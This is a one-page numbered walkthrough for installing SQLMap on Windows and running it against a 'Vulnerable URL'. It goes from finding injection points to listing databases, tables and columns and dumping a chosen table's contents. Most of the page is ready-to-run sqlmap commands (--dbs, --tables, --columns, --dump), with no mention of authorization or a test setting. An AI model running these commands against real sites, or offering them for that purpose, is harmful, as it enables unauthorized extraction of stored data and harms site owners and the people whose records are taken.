You are on page 1of 1

SQLMap

-----------1) Install Python 2.7


2) Install SQLMap from sqlmap.org
3) Extract sqlmap.zip and place the extracted folder in C:/Python27 folder.
4) Goto Command Prompt
5) Write C:
6) cd Python27
7) cd SQLMap or whatsoever folder you have named it
8) sqlmap.py -u "Vulnerable URL" and press enter
9) Check whether the Vulnerable URL is injectable or not
10) If you get any injection point, then choose the injection point that you wan
t to apply
11) These injection points found by SQLMap are also saved in sqlmap specified aa
dress.
12) Goto the specified address, check the log file
13) Open your log file with notepad
14) copy the payload of chosen injection point
15) sqlmap.py -u "Vulnerable URL" --data "Paste the Payload here" and press ente
r
16) Based on the output, proceed with the following things.
17) sqlmap.py -u "Vulnerable URL" --data "Payload" --dbs to get the available da
tabases
18) Choose the database and fetch the tables
19) sqlmap.py -u "Vulnerable URL" --data "Payload" --tables -D chosen_database
20) Fetch the columns now of chosen tables
21) sqlmap.py -u "Vulnerable URL" --data "Payload" --columns -D chosen_database
-T chosen_table
22) Get the data of all columns of chosen_table by dumping it
sqlmap.py -u "Vulnerable URL" --data "Payload" --dump -D chosen_database -T chos
en_table

You might also like